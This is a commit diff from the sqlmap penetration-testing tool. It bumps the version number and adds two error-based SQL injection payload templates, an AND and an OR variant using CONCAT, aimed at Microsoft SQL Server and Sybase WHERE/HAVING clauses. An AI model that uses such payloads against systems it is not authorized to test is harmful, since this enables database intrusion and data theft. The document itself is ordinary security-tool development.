File tree Expand file tree Collapse file tree
Expand file tree Collapse file tree Original file line number Diff line number Diff line change 1919from lib .core .revision import getRevisionNumber
2020
2121# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
22- VERSION = "1.0.5.18 "
22+ VERSION = "1.0.5.19 "
2323REVISION = getRevisionNumber ()
2424STABLE = VERSION .count ('.' ) <= 2
2525VERSION_STRING = "sqlmap/%s#%s" % (VERSION , "stable" if STABLE else "dev" )
Original file line number Diff line number Diff line change 388388 </details >
389389 </test >
390390
391+ <test >
392+ <title >Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT)</title >
393+ <stype >2</stype >
394+ <level >2</level >
395+ <risk >1</risk >
396+ <clause >1,9</clause >
397+ <where >1</where >
398+ <vector >AND [RANDNUM]=CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')</vector >
399+ <request >
400+ <payload >AND [RANDNUM]=CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)),'[DELIMITER_STOP]')</payload >
401+ </request >
402+ <response >
403+ <grep >[DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep >
404+ </response >
405+ <details >
406+ <dbms >Microsoft SQL Server</dbms >
407+ <dbms >Sybase</dbms >
408+ <os >Windows</os >
409+ </details >
410+ </test >
411+
412+ <test >
413+ <title >Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONCAT)</title >
414+ <stype >2</stype >
415+ <level >3</level >
416+ <risk >3</risk >
417+ <clause >1,9</clause >
418+ <where >2</where >
419+ <vector >OR [RANDNUM]=CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')</vector >
420+ <request >
421+ <payload >OR [RANDNUM]=CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)),'[DELIMITER_STOP]')</payload >
422+ </request >
423+ <response >
424+ <grep >[DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep >
425+ </response >
426+ <details >
427+ <dbms >Microsoft SQL Server</dbms >
428+ <dbms >Sybase</dbms >
429+ <os >Windows</os >
430+ </details >
431+ </test >
432+
391433 <test >
392434 <title >Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)</title >
393435 <stype >2</stype >
You can’t perform that action at this time.
0 commit comments